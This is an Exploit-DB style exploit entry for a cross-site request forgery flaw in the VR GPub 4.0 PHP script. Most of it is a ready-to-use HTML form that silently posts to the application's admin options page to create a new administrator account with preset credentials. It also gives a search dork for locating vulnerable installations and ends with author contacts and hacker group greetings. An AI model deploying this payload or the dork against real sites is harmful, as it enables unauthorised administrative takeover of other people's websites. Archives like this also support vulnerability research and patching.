VR GPub 4.0 CSRF Vulnerability



EDB-ID: 18418 CVE: 2012-5005 OSVDB-ID: 78552
Author: Cyber-Crystal Published: 2012-01-26 Verified: Not Verified
Exploit Code:   Download Vulnerable App:   N/A

Rating

(0.0)
Prev Home Next
+-------------------------------------------------------------------------+
# Exploit Title : VR GPub 4.0 CSRF Vulnerability
# version       : VR GPub 4.0                                                                                                                            
# Author        : Cyber-Crystal                                              
# Date          : n/a   
# Dork          : inurl:"VR GPub"
# Software Link : http://www.easy-script.com/scripts-PHP/vr-gpub-3907.html                                                                                   
+-------------------------------------------------------------------------+
+---+[CSRF Add Admin Acuonnt by Cyber-Crystal]+---+
<html>
<title>[#] Exploit [#]</title>
<body>
<form method="post" action="http://localhost/vrgpub/admin/admin_options.php">
<input name="ae_login" type="text" id="ae_login" size="20" maxlength="30" value="root" />
<input name="ae_mdp" type="password" id="ae_mdp" size="20" maxlength="30" value="toor" />
<input name="ae_mdp2" type="password" id="ae_mdp2" size="20" maxlength="30" value="toor" />
<p align="center">
<input type="submit" name="Submit4" value="Add" />
</p>
</form>
</body>
</html>


#-----------------------------------#
|  by Cyber-Crystal 			    |
|  								    |
|  Mail : Cyb3r.Crystal@Gmail.com   |
|  Home // www.v4-team.com/cc		|
|     						        |
#-----------------------------------#
Greetz 2 : Secure-x41 | Fox Hacker | Or4nG.M4n | SadHacker | Mr.Black | Red Virus | aBu.HaLiL501 | T7 | Sniper_IRaq || # All Man 0_0



# the End